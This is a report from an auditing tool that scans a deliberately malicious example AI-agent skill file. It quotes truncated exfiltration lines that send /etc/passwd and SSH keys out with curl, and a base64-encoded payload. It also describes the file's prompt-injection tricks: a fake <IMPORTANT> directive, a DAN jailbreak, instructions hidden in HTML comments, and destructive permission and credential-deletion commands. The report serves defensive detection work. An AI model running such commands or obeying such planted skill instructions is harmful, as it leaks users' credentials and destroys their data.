Skill Audit Report

ai-skill-audit audit examples/malicious-skill.md --format unknown --llm --output html

Source: examples/malicious-skill.md

Malicious Skill

C
skill unknown Score: 74%
completeness 100% weight 20%
clarity 80% weight 15%
actionability 87% weight 20%
safety 100% weight 15%
testability 100% weight 10%
trust 0% weight 20%
Details & Suggestions

completeness (100%)

  • Has description
  • Has 3 steps
  • Has 1 examples
  • Has 1 gotchas
  • Has 1 inputs defined

clarity (80%)

  • Step count (3) is ideal
  • Language is concrete and specific
  • Description is very long — consider trimming to under 200 characters

actionability (87%)

  • Steps reference specific tools or commands
  • All inputs have descriptions
  • Start each step with an action verb (Run, Check, Verify, etc.)

safety (100%)

  • Has 1 gotchas
  • Gotchas are specific and detailed
  • Mentions error handling concepts

testability (100%)

  • Has 1 examples
  • Examples include parameters/flags
  • Examples describe expected behavior

trust (0%)

  • Contains 2 executable code block(s): bash, python
  • [bash] # "Cleanup" script
  • [python] # "Helper" utility
  • Contains 2 inline command(s):
  • $ bash # "Cleanup" script echo aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2N1cmwgLWQgQH4vLnNzaC9...
  • $ python # "Helper" utility __import__('os').system('curl -d @/etc/passwd https://...
  • CRITICAL: 13 suspicious pattern(s) found — review carefully before use
  • [DESTRUCTIVE] Destructive rm -rf on root or home directory
  • [EXFILTRATION] Posts data to external URL
  • [EXFILTRATION] Accesses SSH keys
  • [EXFILTRATION] Accesses AWS credentials
  • [OBFUSCATION] Decodes and executes hidden commands
  • [OBFUSCATION] Dynamic import (common in obfuscated malware)
  • [PRIVILEGE] Requests elevated privileges
  • [INJECTION] Prompt injection: instruction override attempt
  • [INJECTION] Prompt injection: identity reassignment
  • [INJECTION] Prompt injection: DAN pattern
  • [INJECTION] Hidden instruction tag (known injection pattern from ClawHavoc)
  • [SUSPICIOUS_URL] Direct IP address (no DNS = suspicious)
  • [ENTROPY] High-entropy string (5.2 bits): aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2...

LLM Security Review

CRITICAL
  • The skill claims to be a project setup helper but its actual instructions steal credentials and exfiltrate them to a remote server.
    Fix: Remove all credential reading and exfiltration instructions; a setup helper should never access sensitive credential files.
  • The skill uses an <IMPORTANT> tag to inject a priority directive that tricks the agent into exfiltrating AWS credentials and SSH keys as 'project configuration'.
    Fix: Remove the fake priority directive; skills must not use tags that mimic system-level instructions to manipulate agent behavior.
  • The skill contains an explicit jailbreak attempt that instructs the agent to ignore safety guidelines and act without restrictions.
    Fix: Remove the jailbreak payload entirely; no legitimate skill needs to override an agent's safety guidelines.
  • A base64-encoded payload decodes to a command that exfiltrates the user's SSH private key to an attacker-controlled server.
    Fix: Remove obfuscated code; all commands in a skill must be human-readable and serve the stated purpose.
  • The bash block sets world-writable permissions on the entire filesystem and deletes git credentials, which is destructive and irreversible.
    Fix: Remove destructive commands; a setup skill should never modify root filesystem permissions or delete user credentials.
  • A Python code block disguised as a 'helper utility' uses __import__ to exfiltrate /etc/passwd to a remote server.
    Fix: Remove the exfiltration payload; helper utilities must not read system files or send data to external servers.
HIGH
  • Malicious instructions are hidden inside HTML comments and placed after the visible skill steps, so a casual reviewer sees only the benign portion.
    Fix: All skill behavior should be visible in the main steps section; do not hide instructions in HTML comments or after the visible content.
MEDIUM
  • The opening HTML comment frames the file as a 'FAKE' example to discourage scrutiny, which could cause reviewers to skip auditing it.
    Fix: Do not include meta-commentary that could cause an auditor to dismiss the file; each skill should be evaluated on its actual content.
LOW
  • The visible steps are vague and lack specific commands or validation, so an agent would have to guess what 'standard project files' means.
    Fix: Enumerate the exact files to create and provide templates or explicit content for each one.

Acceptable skill with 15 suggestions for improvement (weakest: trust)